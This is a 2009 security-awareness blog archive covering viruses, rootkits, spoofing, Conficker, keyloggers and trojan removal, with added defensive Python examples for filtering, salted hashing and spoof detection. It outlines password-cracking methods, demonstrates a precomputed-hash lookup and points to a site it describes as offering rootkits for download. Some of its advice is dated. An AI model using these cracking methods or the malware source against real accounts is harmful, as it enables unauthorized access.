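To make the difference between plain packet filtering and stateful inspection concrete, here is an added Python model of both (this is example code written for this page, not the blog's own code or any real firewall). Addresses come from the RFC 5737 documentation ranges, the internal prefix and the rule set are constructed, and a packet is reduced to the five fields the filter inspects rather than a real IP header.

```python
"""Toy packet filter: static rules plus stateful inspection (added example)."""
import ipaddress
from collections import namedtuple

# A packet is reduced to the fields the filter actually inspects.
Packet = namedtuple("Packet", "proto src sport dst dport")


class StatefulFilter:
    def __init__(self, inside_cidr, static_rules=()):
        # Hosts in this prefix are "our" network (assumption for the example).
        self.inside = ipaddress.ip_network(inside_cidr)
        # Packet-filtering rules: (proto, dport) pairs allowed inbound
        # unconditionally, e.g. a published web server port.
        self.static_rules = set(static_rules)
        # Stateful inspection: the parts of outbound requests we remember so
        # that only matching replies are let back in.
        self.sessions = set()

    def _inside(self, addr):
        return ipaddress.ip_address(addr) in self.inside

    def handle(self, pkt):
        """Return 'allow' or 'drop' for pkt and update the session table."""
        src_in, dst_in = self._inside(pkt.src), self._inside(pkt.dst)

        if src_in and not dst_in:
            # Outbound request: record it so the reply can be matched later.
            self.sessions.add(pkt)
            return "allow"

        if dst_in and not src_in:
            # Inbound: accept if it is the reply to a recorded request ...
            expected_request = Packet(pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
            if expected_request in self.sessions:
                return "allow"
            # ... or if a static packet-filter rule explicitly opens the port.
            if (pkt.proto, pkt.dport) in self.static_rules:
                return "allow"
            return "drop"

        # Anything that does not cross the boundary in a sensible direction is dropped.
        return "drop"


def demo():
    """Run a constructed traffic sample through the filter; returns the decisions."""
    fw = StatefulFilter("192.168.1.0/24", static_rules=[("tcp", 80)])
    traffic = [
        Packet("tcp", "192.168.1.10", 51000, "198.51.100.7", 443),   # browser -> web site
        Packet("tcp", "198.51.100.7", 443, "192.168.1.10", 51000),   # matching reply
        Packet("tcp", "198.51.100.7", 443, "192.168.1.10", 51001),   # unsolicited, wrong port
        Packet("udp", "203.0.113.9", 5000, "192.168.1.10", 51000),   # unsolicited, wrong protocol
        Packet("tcp", "203.0.113.9", 40000, "192.168.1.20", 80),     # opened by the static rule
    ]
    return [fw.handle(p) for p in traffic]


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```

The third and fourth packets are the point of the exercise: a pure packet filter with "allow tcp/443 inbound" would pass them, while the stateful table rejects them because no inside host asked for them.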

Sunday, May 24, 2009

Computer virus strikes US Marshals, FBI affected

A mystery computer virus affected the computer networks of the US Marshals and the FBI. Both shut down their networks to prevent further spreading and destruction. The computer networks were disconnected from the Justice Department as a preventive measure. The virus problem started on Thursday. The origin of the virus has not been identified. Besides the external network, the law enforcement department has its own internal network to prevent snoopers from accessing sensitive data. The internet access and e-mail services of the US Marshals and FBI were disabled while staff worked on the problem.

Thursday, May 21, 2009

Resident Virus

As you know, a virus will normally infect an executable file and will be executed when the infected file is executed. According to the mode of infection, viruses are divided into resident and non-resident viruses. A non-resident virus has a module to find the files it can infect, and another module, called the replication module, which infects the files encountered by the finder module. After infecting a particular file, the virus will be executed whenever the infected file is executed.
In the case of a resident virus, things are different. It first infects a file or gets executed by some other means. When executed, it loads its replication module into memory. By working from memory it can infect files to a great extent. So there are two types of resident viruses: those capable of infecting a large number of files in a short duration, called fast infectors, and those that infect fewer files, called slow infectors. The fast-infecting type is somewhat more dangerous, since it infects more programs in a short duration. If the infected files include those of the antivirus, there is a chance of infecting the files scanned by the antivirus. A fast infector shows symptoms of infection very soon, mostly by slowing down the PC. There are antiviruses that become active when an abnormality is identified and disinfect the infected file. Slow infectors do not show symptoms such as slowing down the PC, so they are less likely to be identified by the antivirus, but they do not remain unidentified forever. Since they show signs of infection very late, they are identified very late. However, they are less dangerous than fast infectors.

Sunday, May 17, 2009

Crimeware

Crimeware consists of applications developed to steal personal information or to commit a crime. Usually crimeware is used to steal money from the accounts of companies or traders, making the thief richer. Crimeware uses several methods. The attacker can use a keylogger trojan to steal keystrokes from the user, who may be an employee of a bank or other financial institution, and use the stolen information for his job. Another method is redirecting the user to a fake website even if the user has entered the URL correctly. Crimeware allows the attacker to wait until the user logs in to his account and then steal the information without being noticed by the user. Crimeware can steal passwords from the browser's cache. Crimeware exploits vulnerabilities in applications that use the internet connection. The attack may also come in the form of an e-mail with fake sender details.

Saturday, May 16, 2009

Password Cracking

Password cracking is the process of recovering a password. Usually password cracking is used to find a password lost by the user. Like every development in technology, it is also used for illegal purposes: attackers use password cracking for hacking, for example to determine the active passwords of e-mail accounts. The passwords they crack include those of websites, computers, domains, etc.
In most networks, authentication is used to allow limited access to the network. Authentication is generally done using a user name and password; without them a computer is not allowed to access the network. In most cases the password is not stored in plain text form, because a plain-text password is more vulnerable to attack. For security reasons the password is encrypted. This is done in different ways; typically the password is mixed with certain data and the resulting form is stored in the corresponding database. If an attacker gets this encrypted password, it becomes easier for him to find out the original password.
One method of password cracking is guessing. If the attacker knows the user, he guesses the password by simply trying the names of friends, pets, favorite celebrities, etc. The other type of guessing involves trial and error with common password words like admin, administrator, password, passcard, etc.
Another way of finding the password is to use software that generates password-like words from a dictionary. A good percentage of people create passwords from dictionary words. Some people may prefix or postfix a digit, which is usually 1.
Another type of attack is the brute force attack. This has a higher chance of success if the password is short. That is why most sites requiring authentication ask for a password with more than 6 characters. The brute force attack tries every string that could possibly be the password.
Precomputation is another method of finding a password. It involves hashing each word in the dictionary and storing the result. This way, when a new encrypted password is obtained, password recovery is very easy.
Password cracking can be prevented by using strong encryption during transmission. In the case of passwords stored on the system, the password must be accessible only to trusted applications.
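The precomputation paragraph above is the classic argument for salting stored passwords, so here is an added Python example (written for this page, not the blog's own code) that shows both sides: a table built once from a word list recovers an unsalted hash instantly, but the same table is useless against a per-user salted, iterated hash. The word list is constructed from the words the post itself mentions, "password1" stands for the dictionary-word-plus-digit habit, and the PBKDF2 iteration count is an assumed work factor.

```python
"""Precomputed hash table vs. salted, iterated hashing (added example)."""
import hashlib
import hmac
import os

# Constructed word list based on the common passwords named in the post.
WORDLIST = ["admin", "administrator", "password", "passcard", "password1"]
ITERATIONS = 100_000  # assumed work factor for the example


def unsalted_hash(password):
    """The weak scheme: one fast hash of the password alone."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_precomputed_table(words):
    """Precomputation: hash every dictionary word once, index digest -> word."""
    return {unsalted_hash(w): w for w in words}


def lookup(table, digest):
    """Recover a password from a stored digest in O(1) if it is in the table."""
    return table.get(digest)


def store_salted(password, salt=None):
    """The defensive scheme: random per-user salt plus an iterated KDF."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, dk.hex()


def verify_salted(password, salt, stored_hex):
    """Constant-time comparison of a fresh derivation against the stored value."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(dk.hex(), stored_hex)


if __name__ == "__main__":
    table = build_precomputed_table(WORDLIST)
    print("unsalted digest found in table:", lookup(table, unsalted_hash("password1")))
    salt, stored = store_salted("password1")
    print("salted digest found in table  :", lookup(table, stored))
    print("salted verification           :", verify_salted("password1", salt, stored))
```

Two things to notice when running it: the same password stored with two different salts yields two different digests, so a precomputed table would have to be rebuilt for every user, and each entry of that rebuilt table costs ITERATIONS hash operations instead of one.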

Thursday, May 14, 2009

Know your Computer's internet security

You may know that a computer can communicate with other computers only through ports. A computer can be connected to the internet only through ports. A computer has thousands of ports, but we require only a few of them. If a remote computer needs a port, it sends a request to the computer for access to that particular port. Each port is identified by its port number. The computer receives the request and allows the program on the remote computer to access the computer. This is the normal case, I mean the ideal case. But the programs on the remote computer are human-created and so there is a chance of errors. Moreover, some programs are malware that uses trusted programs to get into the computer. By closing the unnecessary ports we can prevent the remote computer from accessing our computer to some extent. But this will not protect your computer completely from attacks through the internet; it only reduces the chance of attack through the internet connection. To find out which ports are open and which are closed, visit: http://scan.sygate.com/
If you use firewall software you can manage which programs access the internet and block the unwanted ones. But the presence of rootkits can even cheat the firewall.

Want to know about Rootkits ?

You may have noticed that while scanning for viruses with antivirus software, it sometimes displays "Rootkits found". Want to know about rootkits? Here is a small description. A rootkit is a program, or a combination of programs, designed to hide the fact that a system has been compromised. Rootkits are installed by the attacker on the target machine, either physically by himself or by exploiting system vulnerabilities. Once the rootkit is installed on the target system, the attacker can modify system files and hide the running processes of the files he installed. Rootkits often form a back door in the system, allowing the attacker to steal data from the system without the user knowing.
Actually, rootkits evolved as software to handle the system when it falls into a non-responsive state. Later, hackers turned this into malware. Applications that create virtual devices, like Daemon Tools, use rootkit techniques to hide certain system activity and to suppress certain system processes. Kaspersky antivirus uses rootkit techniques to hide and protect its files from attack by malware.
Most antiviruses are not capable of finding rootkits. Even if an antivirus finds certain types of rootkits, it cannot find all types. Fortunately, software for finding rootkits (like RootkitRevealer) is available for finding and deleting rootkits. Most rootkits are installed on the target machine by the user himself, in the form of a patch or key generator. Many rootkits are available on the internet for download, for example at http://vx.netlux.org/.

Monday, May 11, 2009

Make e-banking more secure...

We are familiar with stories of people who lost their money via e-banking. Banks are stepping up security as cases of money loss through e-banking increase. But in most cases the money loss is due to the unawareness of the user rather than the security provided by the banks. Here are some tips that would help increase your security in e-banking:

* Do not use computers in internet cafes or in other institutions that you find less secure. It is always better to use your own personal computer for this purpose. Computers in internet cafes have less security, as they contain lots of malware, spyware and viruses. These may steal your account details and send them to the hacker, who can then easily take money from your account. Some computers in internet cafes have antivirus software installed, but do not trust this as high security, because in most internet cafes the antivirus software is not updated periodically, and such software cannot prevent newly created spyware.
* Use good antivirus software on your computer. It is most important that you update the antivirus software periodically. This enables the software to detect more and more viruses and thus increases the security of your computer.
* Use a firewall other than the Windows firewall, so that we can monitor the usage of the internet by the programs on the computer and block the programs that do not require an internet connection.
* Always go to the website by typing the URL directly in the address field. Do not go to the website through a search engine, as it may lead to a spoofed website. A spoofed website may look similar to the original so that the user believes he has reached the original website. The user enters his details in the spoofed website and his money is taken by the hacker. It is also important to check whether you have entered the correct address.
* Use a good browser like Firefox or Internet Explorer for browsing.
* Do not save passwords in the browser. Saved passwords can be stolen by a hacker who understands the browser's storage algorithm.
* Also check that the prefix of the URL in the address field is https instead of http.

Friday, May 8, 2009

Website Spoofing

Website spoofing is the practice of creating a website as a hoax: the reader feels that the website was created by a different person or organisation. In most cases readers reach these sites by making small mistakes while entering the URL in the address bar. For example, if the user enters www.virsu.com instead of www.virus.com, he may reach the spoofed site. (This is only an example and doesn't mean that www.virsu.com is a spoofed site.) URL redirection is another technique used for spoofing. URL redirection is generally used to send a user to a specific website, i.e., to have more URLs for a specific website, and this facility is misused for spoofing. Another method is the use of control characters, which are non-printable characters represented by ASCII codes. The main motive of website spoofing is to publish false information regarding a person, authority or organisation.
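The two clues the paragraph names, a near-miss host name and control characters hidden in the URL, are both cheap to check before a user (or a proxy) follows a link. The following Python function is an added example written for this page, not the blog's own code: it flags hosts within a small edit distance of a known-good list and any host containing ASCII control characters. The known-good list is constructed around the post's own www.virus.com illustration and is hypothetical.

```python
"""Flag lookalike host names and control characters in URLs (added example)."""
from urllib.parse import urlsplit

# Constructed allow-list of sites the user actually intends to visit.
KNOWN_HOSTS = ["www.virus.com", "www.examplebank.test"]


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def check_host(host, known_hosts=KNOWN_HOSTS, max_distance=2):
    """Return None if the host is known and clean, else (reason, matched_known_host)."""
    # Non-printable ASCII (0-31, 127) has no business in a host name.
    if any(ord(c) < 32 or ord(c) == 127 for c in host):
        return ("control-character", None)
    h = host.lower()
    if h in known_hosts:
        return None
    for good in known_hosts:
        if levenshtein(h, good) <= max_distance:
            return ("lookalike", good)
    return None


def check_url(url, known_hosts=KNOWN_HOSTS):
    """Convenience wrapper: pull the host out of a full URL and check it."""
    host = urlsplit(url).hostname or ""
    return check_host(host, known_hosts)


if __name__ == "__main__":
    for url in ("http://www.virus.com/", "http://www.virsu.com/", "http://www.virus.com\x08/"):
        print(repr(url), "->", check_url(url))
```

The distance threshold of 2 catches the post's transposition (virsu/virus) and single-character slips; raising it increases false positives against legitimately similar names, so in practice the allow-list should stay short and specific.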

Thursday, May 7, 2009

e-mail spoofing

E-mail spoofing is a technique used to send spam mails. In e-mail spoofing the sender address and other parts of the e-mail header are modified so that the recipient feels that the e-mail came from a different source. If the attacker requires a response from the recipient, he adds his own e-mail address to the Reply-To field. This is helpful in finding the attacker. But in some cases the attacker puts a false address in the Reply-To field. In such cases the recipient's reply may badly affect an innocent third person.
There is software that generates random e-mail addresses for the attacker to use. If the recipient finds the origin of the e-mail, it is rare that the address is still active. Some worms use mass mailing. Here the worm infects a user; when the user opens the e-mail it triggers the worm, which reads the user's address book and sends e-mail to all the addresses in it. If the gateway blocks this infected mail, a message is shown that a virus has been blocked.
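Because the post describes the Reply-To trick, the simplest detection a mail filter can do is compare the domains of From, Reply-To and Return-Path. Here is an added Python example of that check (written for this page, not the blog's own code); the two messages are constructed using reserved example domains, and a real filter would additionally consult SPF and DKIM results rather than header consistency alone.

```python
"""Flag header inconsistencies typical of spoofed mail (added example)."""
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: From claims one domain, Reply-To and Return-Path point elsewhere.
SPOOFED = """From: "Account Team" <support@examplebank.test>
Reply-To: collector@mailbox.example
Return-Path: <bounce@randomhost.example>
To: victim@example.org
Subject: Verify your account

Please reply with your details.
"""

# Constructed sample where every sender-related header agrees.
CLEAN = """From: "Account Team" <support@examplebank.test>
Reply-To: support@examplebank.test
Return-Path: <bounce@examplebank.test>
To: victim@example.org
Subject: Statement available

Your statement is ready.
"""


def address_domain(header_value):
    """Extract the bare, lower-cased domain from a header like '"Name" <user@host>'."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower() if "@" in addr else ""


def spoof_indicators(raw_message):
    """Return human-readable findings; an empty list means the headers agree."""
    msg = message_from_string(raw_message)
    from_domain = address_domain(msg.get("From"))
    findings = []
    for header in ("Reply-To", "Return-Path"):
        dom = address_domain(msg.get(header))
        if dom and dom != from_domain:
            findings.append(f"{header} domain '{dom}' differs from From domain '{from_domain}'")
    return findings


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("clean", CLEAN)):
        print(name, "->", spoof_indicators(raw) or "no indicators")
```

A mismatch is an indicator, not proof: mailing-list software and ticketing systems legitimately set Reply-To elsewhere, which is why such a rule is usually scored rather than used to reject outright.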

Wednesday, May 6, 2009

IP Address Spoofing

The protocol generally used to communicate between systems is the Internet Protocol (IP).
Data is sent through the internet in the form of packets. Each packet has a header which contains general information about the packet. The IP header contains the source address and the destination address. The source address is generally the IP address of the system from which the packet is sent over the internet, and the destination address is the IP address of the system to which the data is sent. In IP address spoofing, the source address in the header is replaced by a false address and the packet is sent to the target system. The response from the target system is sent to the false address. The attacker may be able to predict the response from the target machine, or he can direct the response to his own IP address.
IP spoofing is usually used in Denial of Service (DoS) attacks. Here the attacker doesn't need to know the response of the target machine; he just needs to send packets to the target with a false address. Each packet to the target may carry a different false source address, so it is difficult to filter out the unwanted packets.
It is difficult for the attacker to attack a system which requires authentication, but it is possible to attack the target to some extent. In some networks, for example a bank's network, every system is interconnected and authentication may not be required to communicate between these systems. If the attacker succeeds in gaining access to one of the systems in the bank, he can simply attack the whole network.
One method of preventing spoofing is to filter the incoming and outgoing packets. The gateway to a network usually performs ingress filtering, which blocks data coming from the outside network with a source address inside the network. Similarly, the gateway performs egress filtering, which blocks outgoing packets with a source address outside the network. These measures prevent spoofing only to some extent.
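The ingress/egress rule above is simple enough to write down exactly, so here is an added Python example (written for this page, not the blog's own code) of a border filter applying it. The internal prefix and the traffic sample are constructed from RFC 1918 and RFC 5737 addresses, and the direction is passed in explicitly, as a border router would know it from the interface a packet arrived on. It goes one step beyond the post by also dropping inbound packets whose source lies in private or loopback ranges, which is standard practice alongside ingress filtering.

```python
"""Ingress/egress anti-spoofing filter at a network border (added example)."""
import ipaddress

INSIDE = ipaddress.ip_network("10.20.0.0/16")  # assumed internal prefix

# Extension beyond the post: source ranges that should never arrive from the
# public internet (loopback, link-local, RFC 1918 private space).
NEVER_FROM_OUTSIDE = [
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def decide(direction, src, inside=INSIDE):
    """Classify one packet by direction and source address.

    direction is 'ingress' (arriving from outside) or 'egress' (leaving).
    Returns (action, reason).
    """
    addr = ipaddress.ip_address(src)
    if direction == "ingress":
        if addr in inside:
            return "drop", "ingress packet claims an internal source address"
        if any(addr in net for net in NEVER_FROM_OUTSIDE):
            return "drop", "ingress packet from a private/loopback range"
        return "allow", "external source arriving on the external interface"
    if direction == "egress":
        if addr not in inside:
            return "drop", "egress packet with a source address we do not own"
        return "allow", "internal source leaving via the gateway"
    raise ValueError("direction must be 'ingress' or 'egress'")


def filter_log(packets):
    """Apply decide() to (direction, src) pairs; return the list of actions."""
    return [decide(direction, src)[0] for direction, src in packets]


# Constructed traffic as seen at the border.
SAMPLE = [
    ("ingress", "10.20.5.5"),      # spoofed: outsider claiming to be inside
    ("ingress", "198.51.100.23"),  # normal inbound
    ("ingress", "192.168.0.1"),    # private source arriving from the internet
    ("egress", "10.20.1.9"),       # normal outbound
    ("egress", "203.0.113.77"),    # spoofed: our host claiming an outside source
]

if __name__ == "__main__":
    for (direction, src), action in zip(SAMPLE, filter_log(SAMPLE)):
        print(f"{direction:7} {src:16} {action}")
```

The last sample line is the one that matters for the DoS scenario in the post: egress filtering stops a compromised internal host from flooding someone else with forged sources, which is why the measure protects other networks as much as one's own.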

Tuesday, May 5, 2009

Cyber Spying


Cyber spying is the practice of stealing data or information from a computer without the knowledge of the owner. Cyber spying targets competitors, governments, enemies, economists, politicians, etc. Cyber spying may be done on a computer located far away from the attacker. Cyber spying can be done with the help of several kinds of malicious software, including viruses, trojans, spyware, etc. Cyber spying is done at the workplace by a computer professional or from home by a trained professional hacker. Cyber spying is done by infiltrating the computer network illegally. There are strong laws to prevent cyber spying.

You will get detailed information from:

http://www.rainbowskill.com/internet-fundas/all-about-chinese-cyber-spying.php

Sunday, May 3, 2009

A zombie computer

Many people know that a hacker can use a computer connected to the internet for his illegal purposes. Such a computer, connected to the internet and obeying a hacker via a virus or trojan, is called a zombie computer. The computer becomes a zombie when a virus or trojan gets installed on it. There may be several such computers working simultaneously for a particular hacker, which makes it difficult to trace the hacker. Since the owner of the computer is unaware of this, the computer is known as a zombie.
Zombies are generally used for sending spam e-mails and for spreading trojans or computer viruses. This helps the spammers not only to save their bandwidth cost but also to remain undetected. Certain hackers use zombies to commit click fraud against sites displaying pay-per-click advertisements. Hackers also use zombies for Denial of Service (DoS) attacks. Here the hacker sends unnecessary packets to the targeted website so that legitimate users cannot access it. Intense flooding can be easily found out and prevented, but pulsating flooding can remain unidentified for several months or years. DoS attacks have even been carried out against top sites like Yahoo, eBay, etc.
Network Intrusion Prevention Systems (NIPS) are useful for preventing, detecting and blocking zombie computers. Computer users should frequently perform backups and delete suspicious mail messages as preventive measures against infection.

Thursday, April 30, 2009

Conflicker : Want to know more ?

Most computer users were afraid of the Conficker worm. Conficker is a worm that affects computers running Windows. Conficker exploits vulnerabilities of Windows and became the headache of many computer users. The name Conficker is derived from the word 'configure' and the German word 'ficker', which means 'fucker'. Conficker was discovered in November 2008. It propagates through the internet and exploits a vulnerability in the network services of Windows (Windows 2000, Windows Server 2003, Windows XP, Windows Vista and Windows Server 2008). Microsoft has released a patch to counter Conficker. Conficker has 5 variants: A, B, C, D and E.

Symptoms of infection
On 13 February 2009, Microsoft offered a USD 250,000 reward for information leading to the arrest and conviction of the individuals behind the creation and/or distribution of the Conficker worm.

Wednesday, April 29, 2009

Protect your PC from conflicker

There are several ways to protect a PC from Conficker. Since it affects PCs running Windows, most PC users are troubled by it. The methods of protecting the PC from Conficker are the common procedure for the removal of viruses.
  • Use good, updated antivirus software that is capable of detecting and healing the infected areas.
  • Download the latest patch from Microsoft's website.
The link is: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
  • Turn on the firewall.
  • If an outbreak of Conficker (or any other virus) is predicted in the future, save a backup copy of all the data in your system to an external storage device like a CD or DVD.

Monday, April 20, 2009

DeepFreeze: Substitute for antivirus software

Most people install antivirus software and do not update it. This gives new viruses a chance to escape the virus scan done by the antivirus software. Some antivirus products, even when updated, may not have the virus signatures, so the presence of certain viruses will not be discovered. A product by Faronics Corporation removes the difficulty of updating the antivirus software. DeepFreeze is not antivirus software, but it prevents virus attacks very efficiently.



DeepFreeze allows the user to freeze any drive he wants, including the drive on which the operating system is installed. After freezing the drive we cannot save or make changes to data or files on the frozen drive. We can save a file on the frozen drive, but during the system restart the file will be lost. While saving a file on the frozen drive, no warning is displayed about the loss of data on the next restart. So DeepFreeze must be used carefully.
We can save a file or install software permanently on the frozen drive only after putting DeepFreeze in Thawed mode. To put DeepFreeze in Thawed mode, hold shift and click on the DeepFreeze icon in the system tray. A window will appear on the screen. Then set a password, and you can change DeepFreeze to Thawed mode in a few mouse clicks.

Friday, April 17, 2009

Google News Alert Virus

Almost all internet users trust Google for their services. Now hackers are exploiting this trust. People who want to keep in touch with the latest events activate Google News Alerts. But recently a new virus emerged under the name Google News Alert.
The virus is sent to the victim in an e-mail that looks the same as a Google news alert. When the victim opens the mail there is an article with a link. If the victim clicks on the link, he is taken to a website. Then a pop-up appears informing him that his system is infected with a virus and that he has to download some antivirus software to remove it. The pop-up offers to download the antivirus software. If the user allows the computer to download it, the result is the installation of the virus on the victim's system.
Due to the increasing number of cyber attacks it is hard to keep the computer away from viruses. However, taking precautions will reduce the number of attacks to a great extent. So be careful in using the internet. You will get a detailed idea of the above post from:

Virus attack on DPS Computer System

One of the computer systems of the Texas Department of Public Safety was infected by a virus. The virus affected internal communication systems and also some of the external communication systems. The affected external services include the issuance of Texas drivers' licenses. Fortunately, the database on which Texas police agencies depend for checking identities, warrants and criminal records was unaffected by the virus. The authorities reported that about 80 percent of the offices have had their computer service restored.

Monday, March 2, 2009

Facebook under attack of two malware applications

Two malware applications are suspected to have hit Facebook within a week, possibly reading thousands of personal details. The latest application is said to be posting notifications on users' profiles that say, "[Name on friend list] has just reported you to Facebook for violating our terms of service - this is your official warning. Click here to find out why you were reported." This statement will surely make the victim click on the link. The link in the notification leads to an application named "Facebook - closing down" which, once installed, sends the same message to every one of the user's friends. The first application hit users over the weekend, sending out notifications that one of their friends had "faced some errors" when checking their profile. Users were prompted to click a link to view the error message. Facebook applications need to ask the user's permission before they can access the personal information on their profile, but the rogue application redesigned the permission-requesting page so users did not know what they were clicking on. The application then suggested that users check their friends' profiles for errors, helping the application to spread.

Tuesday, February 24, 2009

Keylogger Trojan

A keylogger trojan is a malicious program that steals your user name and password by logging them to a file and sending it to the attackers. Some keyloggers are available on the market for purchase. They are generally used by parents to track the online activities of their children, and also by people who want to track the contacts and online activities of their life partner. Some keyloggers are capable of monitoring your web browser. If a desired response is found, it records the required information and sends it to the remote attacker. The desired response may be the opening of the site of a bank in which you have an account. Some sites require pointing with the mouse rather than keystrokes, which reduces some of the attacks, but some trojans send screenshots of the victim's application to the remote attacker.
Keyloggers are installed on the victim's machine by making him believe that they are useful software. Most infections come through peer-to-peer (P2P) networks.
To avoid infection, connect only to trusted networks. Download software only from trusted sources. Use updated antivirus software and install a firewall.

Friday, February 20, 2009

Nuker

Nuker is a trojan that allows an attacker to reboot, shut down or even crash a victim's computer that is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the IP address of the victim, the nuker sends packets that make the victim's computer restart, shut down or even crash.

Removal of Nuker

The removal of Nuker is not so difficult. Most of the antivirus products available in the market are able to delete nukers. It can also be deleted manually. For manual disinfection, the approach differs between operating systems. The basic method is to delete the malware file manually and then reboot the computer. In Windows 9x and Windows Me, just go to the command prompt and delete the file using the DEL command. For example, if the file name is nuke.exe in the Windows folder, type:
DEL C:\WINDOWS\NUKE.EXE
and press the ENTER key. Then reboot the system.
Manual disinfection is a risky process, so it is advised only for users who have thorough knowledge of the operating system.

In the case of Windows NT, 2000 and XP, the running file cannot be deleted directly: first rename the nuker (including its extension), then restart the computer, and then delete the renamed file manually.


Note that you have to disable System Restore before manual disinfection. When the file is renamed, the operating system may copy the original file to the System Restore folder as a backup, from which it can be restored later, so the disinfection would fail. System Restore must therefore be disabled first.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

Thursday, February 19, 2009

Trojan.Dropper



Trojan.Droppers are trojans that install themselves on a system without informing the user of their presence. Usually virus writers and hackers create trojan droppers to install other applications or to place backdoor applications. The family was discovered in February 2000 and is also known as Virus.Dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003 and Windows XP. However, the threat level is low and it can be easily removed.


Even so, prevention will reduce the risk of infection. Some of the preventive measures are given below:

  • Use a firewall to block all applications that try to connect to the internet without your permission. This will reduce the risk even after an infection.

  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.

  • Isolate infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software.

  • Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected.

  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administrator-level access is a legitimate application.

  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put up a post on disabling AutoPlay in XP and Vista earlier.

  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access to folders that must be shared only to user accounts with strong passwords.

  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack; if they are removed, threats have fewer avenues of attack.

  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up to date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail and DNS services.

  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.

  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised web site can cause infection if certain browser vulnerabilities are not patched.

  • It is recommended to disable System Restore. You will find more information about enabling and disabling System Restore in XP and other operating systems in the links below.


Disable or enable Windows Me System Restore



Disable or enable Windows XP System Restore
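As an added example (not code from the original post), here is the kind of attachment check the mail-server bullet above describes, written in Python: it parses a message and reports attachments whose extension is on the post's block list. The message, sender and file names are constructed for the demo, and the check normalizes names the way Windows does (trailing dots dropped, case ignored) so double extensions such as "Invoice.PDF.exe" are still caught.

```python
"""Flag e-mail attachments with extensions commonly used to spread threats.

Added example, not part of the original post; the sample message below is
constructed for the demo.
"""
import email
import os
from email.message import EmailMessage
from email.policy import default

# Extensions named in the post; extend this set to suit your own policy.
RISKY_EXTENSIONS = {".vbs", ".bat", ".exe", ".pif", ".scr"}


def _normalized_suffix(filename: str) -> str:
    """Return the last extension as Windows would see it, lower-cased.

    Windows drops trailing dots and spaces when saving a file, so
    "setup.scr." becomes "setup.scr"; the last extension is what decides
    how the file is executed, so "Invoice.PDF.exe" yields ".exe".
    """
    cleaned = filename.strip().rstrip(". ").lower()
    return os.path.splitext(cleaned)[1]


def risky_attachment_names(raw_message: bytes) -> list[str]:
    """Return the original filenames of every part that should be blocked."""
    msg = email.message_from_bytes(raw_message, policy=default)
    flagged = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        # get_filename() checks both Content-Disposition filename= and
        # Content-Type name=, so a name hidden in either header is seen.
        name = part.get_filename()
        if name and _normalized_suffix(name) in RISKY_EXTENSIONS:
            flagged.append(name)
    return flagged


def build_sample_message() -> bytes:
    """Constructed sample: a text body plus one safe and two risky attachments."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"   # constructed address
    msg["To"] = "user@example.com"       # constructed address
    msg["Subject"] = "Reports"
    msg.set_content("Please see the attached files.")
    msg.add_attachment(b"%PDF-1.4 demo", maintype="application", subtype="pdf", filename="report.pdf")
    msg.add_attachment(b"MZ demo", maintype="application", subtype="octet-stream", filename="Invoice.PDF.exe")
    msg.add_attachment(b"MZ demo", maintype="application", subtype="octet-stream", filename="setup.scr.")
    return msg.as_bytes()


if __name__ == "__main__":
    print(risky_attachment_names(build_sample_message()))
```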